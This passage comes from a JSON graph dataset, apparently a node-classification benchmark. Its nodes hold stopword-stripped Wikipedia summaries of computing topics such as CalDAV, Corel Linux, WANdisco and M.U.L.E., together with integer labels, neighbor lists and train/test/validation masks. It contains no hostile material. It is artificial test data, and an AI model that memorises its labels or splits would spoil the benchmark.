fragments files sometimes also decrease scattering i.e improve contiguity locality reference keeping either smaller files directories directory trees even file sequences close disk hfs plus file system transparently defragments files less 20 mib size broken 8 fragments file opened obsolete commodore amiga smart file system sfs defragmented filesystem use defragmentation process almost completely stateless apart location working stopped started instantly defragmentation data integrity ensured metadata normal data",
    "neighbors": [
      2432,
      3841,
      6797,
      2193,
      11667,
      2197,
      11033,
      7070,
      6434,
      9762,
      7983,
      819,
      8627,
      8628,
      3640,
      3512,
      3257,
      8510,
      8640,
      9665,
      10051,
      5840,
      6494,
      8671,
      739,
      1253,
      3312,
      246,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 2688,
    "label": 1,
    "text": "Enhanced_entity–relationship_model:enhanced entity–relationship model enhanced entity–relationship eer model extended entity–relationship model computer science high-level conceptual data model incorporating extensions original entity–relationship er model used design databases developed reflect precisely properties constraints found complex databases engineering design manufacturing cad/cam telecommunications complex software systems geographic information systems gis eer model includes concepts introduced er model additionally includes concepts subclass superclass is-a along concepts specialization generalization furthermore introduces concept union type category used represent collection objects union objects different entity types eer model also includes eer diagrams conceptual models accurately represent requirements complex databases entity type subtype subclass entity type x every necessarily x subclass entity inherits attributes relationships superclass entity property called attribute relationship inheritance subclass entity may specific attributes relationships together attributes relationships inherits superclass common superclass example vehicle superclass along subclasses car truck number common attributes car truck would part superclass attributes specific car truck max payload truck type ... would make two subclasses textbooks discussing eer implementation using purely relational databases booklet discussing eer implementation using object-oriented object-relational databases textbook discussing implementation relational object-relational databases shorter survey articles",
    "neighbors": [
      5632,
      1146,
      8201,
      9481,
      10505,
      9467,
      10258,
      10518,
      4376,
      9112,
      9631,
      7968,
      1697,
      290,
      1314,
      7074,
      7461,
      8742,
      5550,
      5808,
      10418,
      1076,
      9397,
      9527,
      3768,
      4155,
      3004,
      7868,
      9147,
      9661,
      4416,
      5441,
      9663,
      11324,
      11457,
      6085,
      8518,
      72,
      2512,
      853,
      2901,
      7767,
      9942,
      9177,
      11098,
      987,
      860,
      9183,
      7650,
      8291,
      9828,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      2810,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 2689,
    "label": 7,
    "text": "WANdisco:wandisco wandisco plc. dually headquartered sheffield england san ramon california us public software company specialized area distributed computing development offices san ramon california sheffield england belfast northern ireland wandisco corporate contributor hadoop subversion open source projects name wandisco acronym wide area network distributed computing initially offering replication solution distributed teams using concurrent versions system cvs expanded include apache subversion svn multisite plus 2006 git git multisite 2013 gerrit gerrit multisite 2014 2012 wandisco acquired altostor entered big data market non-stop hadoop product altostor founders dr. konstantin shvachko jagane sundar joined wandisco part acquisition helped develop company next generation hadoop product released 2015 wandisco fusion wandisco distributed coordination engine dcone shared component wandisco clustering products dcone system allows multiple instances application operate independent hardware without sharing resources application servers kept synchronisation dcone regardless whether servers lan globally separated accessible wide area network wan wandisco replication technology work yeturu aahlad previously worked sun netscape ibm involved developing corba framework aahlad theorized model effective active replication wan development dcone wandisco taken paxos algorithm baseline added innovations relevant mission-critical high transaction volume distributed environments wandisco provides replication products cvs apache subversion git gerrit apache hadoop amazon web services microsoft azure google cloud platform addition company offers support consultancy training services company website lists companies arm avaya bally technologies barclays blackrock bosch cisco dell emc disney fujitsu general electric honda juniper networks pitney bowes april 2016 wandisco announced ibm signed deal oem wandisco fusion deal allows ibm rebrand fusion ibm big replicate plays important role ibm big data cloud computing strategy including movement data on-premises software cloud july 2018 wandisco announced filed new patent blockchain company claims patent enables effective permissioned blockchain transactions underlying algorithmic mechanism mechanism enables throughput achieved orders magnitude higher public blockchains 2011 wandisco announced ubersvn deployment apache subversion included web based management console ability add additional application lifecycle management features ubersvn download available mid-2013 september 2013 wandisco announced official sponsor uc berkeley amplab five-year collaborative effort university california berkeley wandisco one apache hadoop committer staff jagane sundar february 2013 wandisco released free distribution hadoop containing additional components developed wandisco wandisco involved apache subversion open source project 2008 2015 employed several contributors work subversion project time wandisco provides subversion binary downloads windows centos debian oracle linux rhel suse linux ubuntu mac os x solaris via website binaries use default package management system linux distribution december 2010 wandisco announced intention develop features subversion project specifically aimed improving branching merging functionality apache foundation subversion developers said announcement contained unfounded claims insinuations community involvement lack development features according apache features already worked time david richards wandisco clarified position subversion community followed announcing wandisco sponsorship ongoing support work apache software foundation",
    "neighbors": [
      9248,
      1668,
      7499,
      3791,
      1935,
      7248,
      6834,
      9137,
      4919,
      1049,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2690,
    "label": 4,
    "text": "Hacktivity:hacktivity hacktivity conference traditional event budapest hungary official alternative representatives information security profession meet interested field framework time informal informative sometimes in-depth technological participants official alternative experts information security profession universities colleges professors participating training young people participating high level education/university college students professional trade unions",
    "neighbors": [
      7449,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 2691,
    "label": 9,
    "text": "Visual_programming_language:visual programming language computing visual programming language vpl programming language lets users create programs manipulating program elements graphically rather specifying textually vpl allows programming visual expressions spatial arrangements text graphic symbols used either elements syntax secondary notation example many vpls known dataflow diagrammatic programming based idea boxes arrows boxes screen objects treated entities connected arrows lines arcs represent relations vpls may classified according type extent visual expression used icon-based languages form-based languages diagram languages visual programming environments provide graphical iconic elements manipulated users interactive way according specific spatial grammar program construction general goal vpls make programming accessible novices support programmers three different levels visually transformed language non-visual language superimposed visual representation naturally visual languages inherent visual expression obvious textual equivalent current developments try integrate visual programming approach dataflow programming languages either immediate access program state resulting online debugging automatic program generation documentation dataflow languages also allow automatic parallelization likely become one greatest programming challenges future visual basic visual c visual j etc languages microsoft visual studio ide visual programming languages representation algorithms etc textual even though ide embellishes editing debugging activities rich user interface similar consideration applies rapid application development environments typically support form designer sometimes also graphical tools illustrate define control flow data dependencies parsers visual programming languages implemented using graph grammars following contains list notable visual programming languages many modern video games make use behavior trees principle family simple programming languages designed model behaviors non-player characters behaviors modeled trees often edited graphical editors article originally based material free on-line dictionary computing used update needed",
    "neighbors": [
      9345,
      1924,
      9224,
      6539,
      6797,
      4111,
      5775,
      7825,
      10514,
      5395,
      5651,
      7571,
      9877,
      5527,
      10134,
      4121,
      9626,
      3613,
      4770,
      5415,
      7341,
      10413,
      5680,
      9780,
      1591,
      1207,
      9783,
      4410,
      191,
      576,
      2242,
      6594,
      7363,
      10819,
      8262,
      9926,
      5320,
      11207,
      4042,
      11219,
      1492,
      5845,
      10964,
      7421,
      7769,
      219,
      477,
      9565,
      7395,
      9573,
      4838,
      6502,
      11239,
      2667,
      5612,
      9330,
      9331,
      5751,
      3832,
      2556,
      1917
    ],
    "mask": "Test"
  },
  {
    "node_id": 2692,
    "label": 2,
    "text": "Corel_Linux:corel linux corel linux also called corel linuxos debian-based operating system made corel began beta testing september 21 1999 released public november 15 1999 mainly competed windows 98 windows 2000 microsoft plus mac os 9 apple corel later discontinued distribution remove former corel open source development website march 2002 corel use kfm standard kde file manager instead used file manager cfm along modifications corel made made operating system incompatible versions linux much competitors industry time relatively little linux software available serious hurdle corel users operating system second edition released august 15 2000 download regular deluxe editions latter bundled corel wordperfect office linux xandros purchased corel linux source code development team corel scrapped linux business august 2001 however corel corporation stockholder xandros corel linux following system requirements corel linux featured file manager close look feel windows explorer file manager provided integrated windows smb network browser company also advertised operating system compatible flagship software key selling point corel linux compatibility company wordperfect applications eponymous word processor eighth version given away personal customers hopes would purchase wordperfect office 2000 suite added quattro pro corel presentations corelcentral programs deluxe version suite added paradox database manager latter omits level editor network mode scenarios original game 'limited edition corel linux deluxe came instead railroad tycoon ii unlike free wordperfect 8 office suite written natively linux instead consisted windows programs powered corel fork wine compatibility layer result linux suite suffered performance penalty compared windows version wordperfect 8 wordperfect suite corel adapted graphics applications run linux using wine consisted coreldraw stylized coreldraw suite eponymous program paid software corel photo-paint available free download corel smartmove part corel linux application provided following smartmove built around wine libraries read windows registry settings windows applications thus able migrate smartmove core libraries created wrapper windows registry easily look settings smartmove looks existing microsoft windows installations machine looks little individual users offers transfer application settings analogous programs linux understands deal internet explorer netscape cookies bookmarks outlook mirc icq settings variety desktop preferences including wallpaper color scheme even mouse handedness tried settings since windows installation fairly new n't much check death corel linux application faded away longer maintained however similar functionality available least ubuntu installing dual-boot configuration machine already windows",
    "neighbors": [
      5380,
      8837,
      7435,
      6797,
      10127,
      2321,
      8851,
      10899,
      5397,
      4887,
      10394,
      10397,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      2383,
      1110,
      5721,
      9693,
      3167,
      1632,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      8690,
      5363,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 2693,
    "label": 4,
    "text": "Mondo_Rescue:mondo rescue mondo rescue free disaster recovery software supports linux i386 x86-64 ia-64 freebsd i386 packaged multiple distributions red hat rhel fedora centos opensuse sles mandriva debian ubuntu gentoo also supports tapes disks usb devices network cd/dvd backup media multiple filesystems lvm software hardware raid restoration may done physical media including obdr tape support cd/dvd/usb media network pxe mentioned free software directory emphasis stability ease use according ohloh mondorescue development worth 6m mondo uses linux distribution called mindi provide favorable post boot environment performing data restore unlike disk clone solutions ready use live cd provided mondo rescue instead included mindi package create custom turn-key live cd/dvds using exact linux kernel configuration system backed effect bootable dvd/cd customized computer backed objective reduce possibility missing device drivers kernel incompatibilities may arise using generic vanilla linux kernel pre-built live dvd/cd",
    "neighbors": [
      6280,
      1801,
      5356,
      3791,
      7983,
      9455,
      6514,
      10387,
      4438,
      823,
      2045,
      7134
    ],
    "mask": "Test"
  },
  {
    "node_id": 2694,
    "label": 7,
    "text": "CloudLocker:cloudlocker cloudlocker personal cloud device created stoamigo based paradise nevada cloudlocker offers cloud storage data conversion file sharing powered stoamigo platform unlike public cloud service involves third party access users ’ digital media cloudlocker on-premises cloud solution stays user ’ possession connects home office network via plug play interface cloud computing storage widely acknowledged next big thing many people wary privacy concerns uncomfortable storing personal data pictures videos somebody else ’ server core challenge data privacy share data protecting personal information public cloud storage services google amazon microsoft dropbox offer level protection personal information would available information kept home office according report world privacy forum report found “ information stored business individual third party may fewer weaker privacy protections information possession creator information. ” report goes state “ government agencies private litigants may able obtain information third party easily creator information. ” cloudlocker one many different personal cloud options market today cloudlocker falls server device cloud category personal cloud solutions cloudlocker attempts address internet privacy issue providing personal cloud server users keep sole possession gives global access remote browser user ’ internet-enabled devices files stored cloudlocker accessed pc laptop smartphone tablet via stoamigo platform stoamigo account stoamigo desktop web mobile applications designed sharing viewing streaming digital media cloudlocker used file sharing anyone even stoamigo account users decide share digital media user set permissions recipients view-only download share private file files shared anyone else users share files folders lists multiple contacts customize permission settings person user arrange receive notifications viewed downloaded shared files thus establish audit trail access specific files folders users may modify settings shared files time share choose retract shared files everyone selected recipients users create listen playlists watch video files continuous play devices streaming cloudlocker downloading required native media player streams files cloudlocker dlna compatible user able view media content cloudlocker dlna tv dlna device cloudlocker comes usb ports user attach external hard drives cloudlocker use space additional storage thereby making storage space limitless stoamigo android ios app option create qr code mobile device share file folder list files music playlist cloudlocker stoamigo also available europe",
    "neighbors": [
      4194,
      10185,
      4623,
      7983,
      10161,
      5650,
      823,
      10168,
      2267,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 2695,
    "label": 5,
    "text": "CalDAV:caldav calendaring extensions webdav caldav internet standard allowing client access scheduling information remote server extends webdav http-based protocol data manipulation specification uses icalendar format data access protocol defined allows multiple client access information thus allowing cooperative planning information sharing many server client applications support protocol extensions caldav automated scheduling also standardized caldav specification first published 2003 internet draft submitted internet engineering task force ietf lisa dusseault march 2007 caldav specification finished published ietf rfc 4791 authored cyrus daboo apple bernard desruissaux oracle lisa dusseault commercenet caldav designed implementation collaborative software client server needs maintain access share collections events developed open standard foster interoperability software different implementers architecture caldav partially inherited underlying specifications organizes data events tasks free-busy info notes directories collections multiple items resources reside resources collections accessed one users using standard http dav semantics detect conflicting changes provide locking access control concept acls used operation view edit delete etc denied granted per user therefore specification requires caldav servers must support webdav access control protocol rfc 3744 calendar resources must use icalendar format allows server understand process data parsing icalendar items necessary server support number calendaring-specific operations free-busy time reports expansion recurring events functionality user may synchronize calendar caldav server share among multiple devices users protocol also supports non-personal calendars calendars sites organizations list caldav clients includes list caldav server includes",
    "neighbors": [
      8386,
      5093,
      4490,
      362,
      3246,
      7888,
      3286,
      2679,
      5784,
      11418,
      7415,
      5791
    ],
    "mask": "Test"
  },
  {
    "node_id": 2696,
    "label": 7,
    "text": "SalesforceIQ:salesforceiq salesforceiq formerly relateiq subsidiary salesforce.com american software company based palo alto california company software involves relationship intelligence platform combines data email systems smartphone calls appointments augment replace standard relationship management tools database solutions scans 10,000 emails calendar entries data points per minute first run july 2014 salesforce.com announced plans acquire company close 400 million company founded july 2011 adam evans steve loughlin end july 2013 company hired data scientist dj patil vp product leadership team also includes vp sales armando mann recent head sales dropbox former google executive vp marketing elise bergeron formerly facebook unlike traditional relationship management systems rely data input users keep teams informed run predictive analytics salesforceiq platform automatically isolates analyzes user professional emails interactions combining data information gleaned sources linkedin facebook salesforceiq leverages data science comb emails analyze offer reminders suggestions busy salespeople march 2014 company released closest connections feature automates normally time-consuming—and potentially erroneous—sales process identifying warm introductions potential prospects based real activity happening within team email inboxes phones calendars social networks part 2015 dreamforce conference relateiq rebranded salesforceiq",
    "neighbors": [
      10090,
      467
    ],
    "mask": "Train"
  },
  {
    "node_id": 2697,
    "label": 3,
    "text": "M.U.L.E.:m.u.l.e m.u.l.e seminal multiplayer video game originally written atari 8-bit family ozark softscape published 1983 electronic arts designed danielle bunten berry m.u.l.e ported commodore 64 nintendo entertainment system ibm pcjr japanese versions also exist pc-8801 sharp x1 msx 2 computers plays like strategy game incorporates aspects simulate economics set fictional planet irata atari backwards game exercise supply demand economics involving competition among four players computer opponents automatically filling missing players players provided several different choices race colonist providing different advantages disadvantages paired respective strategies win players compete amass largest amount wealth must also cooperate survival colony central game acquisition use m.u.l.e multiple use labor element develop harvest resources player real estate depending outfitted m.u.l.e configured harvest energy food smithore m.u.l.e.s constructed crystite valuable mineral available tournament level players must balance supply demand elements buying need selling n't players may also exploit create shortages refusing sell players store raises price resource following turns scheming players encouraged allowing collusion initiates mode allowing private transaction crystite one commodity influenced supply demand considerations deemed sold 'off world strategy resource somewhat different—a player may attempt maximize production without fear much supply demand resource required certain things turn instance player short food less time take one turn similarly player short energy land plots wo n't produce output shortage smithore raise price m.u.l.e.s store prevent store manufacturing new m.u.l.e.s make use one land players must also deal periodic random events run-away m.u.l.e.s sunspot activity theft space pirates meteorite potentially destructive beneficial effects game features balancing system random events impact single player favorable events never happen player currently first place unfavorable events never happen player last place leveling playfield applied whenever tie happens game e.g two players want buy resource price player losing position automatically wins tie players also hunt mountain wampus cash reward according jim rushing one four original partners ozark softscape m.u.l.e initially called planet pioneers development intended similar cartels cutthroats graphics better playability focus multiplayer real-time auction element came largely lead designer danielle bunten wheeler dealers board game monopoly used model game encouragement social interaction monopoly came several game elements acquisition development land primary task economy scale effect wherein grouped plots multiple plots type would increased production quantities also inspired different species different tokens monopoly random events affecting individual similar chance cards additional game features claim jumping loans crystite depletion discarded adding complexity without enhancing gameplay setting inspired robert a. heinlein time enough love wherein galactic colonization style american old west pioneers drive primitive tools m.u.l.e based idea genetically modified animal heinlein novel given appearance star wars imperial walker another heinlein novel moon harsh mistress provided decision government external authority land originally sold auction caused feedback loop wealthiest player land thus made money thus developers created land authority gives player free plot land turn ozark softscape developed game atari 8-bit first policy developing advanced computers porting platforms removing altering features sprites necessary bunten stated ozark port game apple ii series m.u.l.e ca n't done apple pc port m.u.l.e developed k-byte software affiliate electronic arts published ibm part venture home market pcjr sold poorly due released 1985 latter discontinued although game actual pcjr support copies existed internet considered lost 2012 vince bray found original disk archived jeff leyda jim leonard m.u.l.e sold 30,000 copies lauded reviewers computer gaming world described fascinating enjoyable game comes best point four human players minor criticisms included too-weak computer opponents lack save feature softline called m.u.l.e computer games like game learning experience also stimulating fun frustrating thought provoking fun addictive fun magazine praised offering valuable lessons economic topics noting learned hard way concluded game feels good virtually flawless human-computer human-human competition john j. anderson wrote creative computing also mention shooting found anywhere game positively refreshing ... mule belongs every atari software shelf world every home every school near every atari scott mace infoworld called m.u.l.e unusual ease allows multiplayer interaction single game computer console wrote would incredible lasting power like best board games stated learned economics marketplace m.u.l.e ever college leo laporte hi-res also said learned economics game college predicted m.u.l.e may revitalize video game industry ought make rich anyway praised theme captivating musical come-on 've ever heard concluded ask m.u.l.e perfect game reporting byte children loved jerry pournelle described m.u.l.e cross hammurabi diplomacy arcade game lots strategic decisions—provided 're skillful enough joystick implement 've decided another reviewer wrote magazine impossible adequately describe interaction economically realistic subtleties m.u.l.e concluding intriguing way illustrate triumphs perils free enterprise orson scott card compute 1983 gave m.u.l.e two ea games worms complimentary reviews writing original set well allow player take part creativity things computers magazine listed game may 1988 one favorite games stating requires sense strategy well proficiency joystick maneuvers steven list reviewed m.u.l.e space gamer 70 commented m.u.l.e simply great game tour de force programming design good family entertainment educational exciting n't computer disk drive may worth investment able play addison-wesley book atari software 1984 gave game overall rating stating combines best features monopoly economic simulation games like hammurabi teaching valuable lessons economies fun way book noted several people play game becomes involved interactive two zzap 64 reviewers stated 1985 m.u.l.e excellent trading game recommended novice skilled third complained found little excitement ... nothing keep interested 1984 m.u.l.e awarded 1984 best multi-player video game/computer game 5th annual arkie awards judges described unique blend boardgame strategy computer-game pacing noted since release 'm.u.l.e gained intense cult following softline readers named game third most-popular atari program 1983 score 7.44 10 1988 m.u.l.e among first members computer gaming world hall fame honoring games rated highly time readers 1992 1994 surveys science fiction games magazine gave title five five stars calling all-time computer classic one games ever devised playable entertaining four humans economics made fun ... still holds well years provides justification holding onto 8-bit atari 1996 magazine named m.u.l.e 3 best games time list named 5 ten greatest pc games ever pc world 2009 m.u.l.e listed 19th important video game time 1up.com chris crawford said game considering platform team deal m.u.l.e greatest game design ever done computer gaming world reported april 1994 ea working videogame version game design terminated creative differences publisher designer magazine reported rumor may 1994 sega genesis version completed ea debating release reported august 1994 bunten decided remaking game ea wanted put guns bombs editorial asked company give us m.u.l.e smithore crystite creator intended bunten working internet version m.u.l.e death 1998 2005 netplay component called kaillera integrated atari800winplus emulator enabling original game played internet several m.u.l.e clones exist including subtrade traders space horse online remake game called planet m.u.l.e released december 6 2009 game free download major platforms comma 8 studios later acquired mobile m.u.l.e license released m.u.l.e returns ios november 2013 super mario bros creator shigeru miyamoto cited m.u.l.e influence pikmin series wright dedicated game sims memory bunten m.u.l.e theme song included wright later game spore easter egg space level ability allows terran players call multiple robotic workers called m.u.l.e.s board game adaptation m.u.l.e board game released 2015 according twin galaxies following records recognized",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2698,
    "label": 2,
    "text": "Memwatch:memwatch memwatch free programming tool memory leak detection c released gnu general public license designed compile run system ansi c compiler primarily intended detect diagnose memory leaks also used analyze program memory usage provided logging facilities memwatch differs debugging software compiled directly program debugged instead compiled separately loaded program runtime",
    "neighbors": [
      2045,
      814
    ],
    "mask": "None"
  },
  {
    "node_id": 2699,
    "label": 4,
    "text": "UniKey:unikey unikey technologies alternative access control company based united states designs licenses keyless entry technology worldwide first product partnership kwikset kēvo bluetooth-enabled deadbolt door lock unikey technologies founded 2010 florida phil dumas serves president chief executive officer electrical engineering degree university central florida background biometric security dumas part team launched smartscan first mass-market biometric residential deadbolt lock started unikey effort create dependable convenient way access everything unikey technologies first came public attention may 2012 dumas appeared abc reality series shark tank unikey received investment offers five judges show including offer 500,000 40 equity stake mark cuban kevin o'leary dumas accepted offer ultimately unable come terms show 2013 unikey raised approximately 2.6 million funding led ff venture capital year unikey announced licensing deal kwikset largest residential lock manufacturer united states one largest world manufacture distribute kēvo residential smart lock using unikey technology launched 2013 kēvo first bluetooth-enabled touch-to-open smart lock kēvo ability detect user compatible smartphone tablet via app lock unlock door deadbolt lock senses user phone nearby outside phone emits low-energy bluetooth signal allowing door unlocked lock face touched making unnecessary interact phone order open door users grant unrestricted temporary access phones well kēvo also comes keychain fob provides touch-to-open function authorized smart phone prime security feature product unikey inside/outside intelligence detects whether verified device currently inside outside home authorized device known inside house unauthorized users unable activate kēvo outside system acts one-way filter lets authorized users pass entryway june 2014 unikey miwa lock company announced partnership offer keyless entry hotels unikey developed touch-to-open passive keyless entry system integrated miwa existing radio-frequency identification hospitality locks keys activated smartphone apps guests check app sent room number phone enabled act virtual key following miwa partnership unikey making way commercial access control industry partnerships grosvenor technologies nortek security control company also expanded international reach partnership uk home security company era",
    "neighbors": [
      2737
    ],
    "mask": "Train"
  },
  {
    "node_id": 2700,
    "label": 3,
    "text": "LibATA:libata libata library used inside linux kernel support ata host controllers devices libata provides ata driver api class transports ata atapi devices scsi ata translation ata devices according t10 sat specification features include power management s.m.a.r.t. pata/sata atapi port multiplier hot swapping ncq",
    "neighbors": [
      1801,
      2804
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2701,
    "label": 5,
    "text": "Connection-oriented_communication:connection-oriented communication connection-oriented communication network communication mode telecommunications computer networking communication session semi-permanent connection established useful data transferred stream data delivered order sent alternative connection-oriented transmission connectionless communication example datagram mode communication used ip udp protocols data may delivered order since different network packets routed independently may delivered different paths connection-oriented communication may circuit switched connection packet-mode virtual circuit connection latter case may use either transport layer virtual circuit protocol tcp protocol allowing data delivered order although lower layer switching connectionless may data link layer network layer switching mode data packets belonging traffic stream delivered path traffic flows identified connection identifier rather complete routing information allowing fast hardware based switching connection-oriented protocol services often always reliable network services provide acknowledgment successful delivery automatic repeat request functions case missing data detected bit-errors atm frame relay mpls examples connection-oriented unreliable protocol circuit switched communication example public switched telephone network isdn sonet/sdh optical mesh networks intrinsically connection-oriented communications systems circuit mode communication provides guarantees data arrive constant bandwidth constant delay in-order delivery bit stream byte stream provided switches reconfigured circuit establishment phase packet switched communication may also connection-oriented called virtual circuit mode communication due packet switching communication may suffer variable bit rate delay due varying traffic load packet queue lengths connection-oriented communication necessarily reliable protocols keep track conversation connection-oriented protocols sometimes described stateful connection-oriented transport layer protocols provide connection-oriented communications connectionless communications systems connection-oriented transport layer protocol tcp may based connectionless network layer protocol ip still achieves in-order delivery byte-stream means segment sequence numbering sender side packet buffering data packet reordering receiver side sequence numbering requires two-way synchronization segment counters three-step connection establishment phase connection-oriented packet switched data link layer network layer protocol data sent path communication session protocol identifies traffic flows channel/data stream number often denoted virtual circuit identifier vci rather complete routing information packet source destination addresses used connectionless datagram switching conventional ip routers connection-oriented communication routing information may provided network nodes connection establishment phase vci defined tables node thus actual packet switching data transfer taken care fast hardware opposed slow software based routing typically connection identifier small integer 10 bits frame relay 24 bits atm example makes network switches substantially faster routing tables simple look-up tables trivial implement hardware impact great fact even characteristically connectionless protocols ip traffic tagged connection-oriented header prefixes e.g. mpls ipv6 built-in flow id field atm frame relay example examples connection-oriented unreliable data link layer protocols also reliable connectionless protocols well ax.25 network layer protocol passes data i-frames combination rare reliable-connectionless uncommon modern networks connection-oriented protocols handle real-time traffic substantially efficiently connectionless protocols especially short constant length packets atm yet replaced ethernet carrying real-time isochronous traffic streams especially heavily aggregated networks like backbones motto bandwidth cheap fails deliver promise experience also shown over-provisioning bandwidth resolve quality service issues hence 10- gigabit ethernet expected replace atm time connection-oriented protocols designed altered accommodate connection-oriented connectionless data examples connection-oriented packet mode communication i.e virtual circuit mode communication",
    "neighbors": [
      4609,
      2306,
      2827,
      5531,
      10924,
      562,
      1586,
      9909,
      7865,
      4797,
      3006,
      5439,
      2752,
      835,
      11591,
      5470,
      5472,
      1893,
      11112,
      2793,
      4589,
      10864,
      2802,
      6267
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2702,
    "label": 2,
    "text": "Ubuntu_Hacks:ubuntu hacks ubuntu hacks tips tools exploring using tuning linux book tips ubuntu popular linux distribution book published o'reilly media june 2006 part o'reilly hacks series",
    "neighbors": [
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 2703,
    "label": 8,
    "text": "TreeRing:treering treering silicon valley ca-based technology company providing on-demand digital printing customizable school yearbooks us canada one first start-ups changed traditional yearbook industry company designed free software social-networking features allowing creation personalized yearbooks offered new business model eliminating financial cost yearbooks schools treering publishing platform allows high school community collaborate web-based yearbooks saved using cloud storage users add share comment photos memories events students parents customize copy school yearbook uploading content personalized pages result addition print version schools opt share online yearbook company business model impose financial obligation schools signing treering unlike traditional publishers business models based offset printing techniques minimum orders ordering paying yearbooks done online 2012 treering printed 125,000 yearbooks raised 3.6 million first round venture funding silicon valley list company investors included mike mccue flipboard co-founder rich barton expedia zillow founder second avenue partners cedar grove investments others 2013 company served 2,000 schools across us anticipating production 200,000 yearbooks company prints yearbooks recycled paper plants tree every printed copy",
    "neighbors": [
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 2704,
    "label": 2,
    "text": "Phoenix-RTOS:phoenix-rtos phoenix-rtos real-time operating system designed internet things appliances main goal system facilitate creation software defined solutions phoenix-rtos successor phoenix operating system developed 1999-2001 pawel pisarczyk department electronics information technology warsaw university technology phoenix originally implemented ia-32 microprocessors adapted arm7tdmi processor 2003 powerpc 2004 system available gpl license decision abandon development phoenix write phoenix-rtos scratch taken creator 2004 2010 phoenix systems company established aiming commercialize system phoenix-rtos 2.0 based monolithic kernel initially versions ia-32 processor configurable esi-risc developed cooperation nxp semiconductors phoenix-rtos 2.0 also adapted vybrid arm cortex-a5 platform version equipped prime phoenix-prime g3-plc phoenix-g3 protocol support used smart grid networks phoenix-rtos runs applications designed written unix operating system phoenix-rtos version 3.0 based microkernel expected completed 2017 geared towards measuring devices low power consumption main problem first implementation low kernel modularity difficulties management process software development device drivers file system drivers phoenix-rtos equipped haas hardware software modules allow implementation rich devices functionality e.g modems existing haas modules include 2016 energa-operator based poland installed 6.6k data concentrator units balancing meter functionality network based phoenix-rtos license agreements use system mass production smart meters signed",
    "neighbors": [
      7170,
      5380,
      9964,
      7983,
      7187,
      5492,
      9366,
      7483,
      8700,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 2705,
    "label": 4,
    "text": "AppShield:appshield appshield world first application firewall appshield conceptualized eran reshef gili raanan introduced market perfecto technologies sanctum summer 1999 appshield product first product inspect incoming hypertext transfer protocol requests block malicious attacks based dynamic policy composed analyzing outgoing html pages product faced many market adoption challenges sanctum forced introduce complementary solution named appscan demonstrate need application security 2004 f5 networks acquired appshield intellectual properties sanctum discontinued technology gartner ’ magic quadrant mq 2015 web application firewalls estimates global waf market size big 420 million 24 percent annual growth",
    "neighbors": [
      2118,
      331,
      5404,
      5178,
      2238,
      4797,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2706,
    "label": 3,
    "text": "VESA_Display_Power_Management_Signaling:vesa display power management signaling vesa display power management signaling dpms standard vesa consortium power management video monitors example usage includes turning putting monitor standby period idle time save power commercial displays also incorporate technology vesa issued dpms 1.0 1993 basing work united states environmental protection agency epa earlier energy star power management specifications subsequent revisions included future vesa bios extensions standard defines signal h-sync v-sync pins standard svga monitor trigger monitor power saving capabilities dpms defines four modes normal standby suspended state power may still drawn order power indicator lights standard",
    "neighbors": [
      9057,
      8682,
      11631,
      11634,
      3548
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2707,
    "label": 2,
    "text": "Samsung_Wave_II_S8530:samsung wave ii s8530 samsung wave ii s8530 samsung wave ii successor samsung wave s8500 smartphone running bada 1.2 operating system designed samsung commercially released october 2010 wave slim touchscreen phone powered samsung hummingbird cpu s5pc110 includes 1 ghz arm cortex-8 cpu powerful built-in powervr sgx 540 graphics engine super lcd screen 720p high-definition video capture capabilities shortage super amoled screens one primary reasons release model design phone made mostly metal alloy measured 10.9 mm thick terms form factor slate style featuring 3 physical buttons front call reject/ shutdown main menu button screen screen capacitive touchscreen super lcd anti-smudge oleophobic coating top scratch-resistant tempered-glass gorilla glass display touch panel shown capable resisting extreme friction scratch-resistant screen resolution 800x480 wvga processor phone features 1 ghz soc internally contains arm cortex a8 cpu core identical arm cortex cpu core used apple a4 package package soc phone graphics engine sgx 540 said capable generating 90 million triangles per second soc used samsung galaxy 256mb+128mb ram hardware samsung wave s8500 camera phone features 5 megapixel supports 2592 x 1944 pixels along autofocus led flash geo-tagging face blink detection image stabilization touch focus etc features various shooting modes beauty shot smile shot continuous panorama vintage shot camcorder able shoot 720p hd recording 1280x720 30 fps flash well also able record slow motion video 320x240 120 fps flash features feature includes a-gps 2 gb/8 gb internal storage microsdhc slot additional 32 gb also magnetometer proximity sensor accelerometer 5.1-channel surround sound mobile theater music recognition fake call service smart search social hub first phone support bluetooth version 3.0 addition bluetooth 3.0 phone also features wi-fi 802.11 b/g/n hsdpa 3.2 mbit/s hsupa 2 mbit/s phone available european/asia 3g bandings north american 3g bandings keep mind north american 3g bandings version phone limited availability available us user interface phone one smartphone feature samsung bada operating system platform ui samsung touchwiz 3.0 touchwiz 3.0 like 2 predecessors touchwiz 2.0 touchwiz utilises widgets 3 notable widgets pre-installed touchwiz 3.0 daily briefing includes essential information weather finance ap mobile news schedule feeds updates buddies allows users call send texts read facebook/twitter feeds favourite contacts users allowed 10 homescreens add widgets applications terms internet browser samsung wave pre-installed dolphin browser v2.0 based webkit browser supports flash disabled default improve page load time default phone comes picsel viewer capable reading .pdf microsoft office file formats users selected countries buy download picsel office editor samsung apps samsung apps users also download applications games widgets application store software includes gps software comes phone lbs route 66 palringo im facebook twitter social hub mini diary daily briefing memo video player fm radio media browser voice recorder e-mail pre-installed asphalt5 media support mp3 aac aac+ e-aac+ wma amr wav mp4 flac mpeg4 h.263 h.264 wmv avi 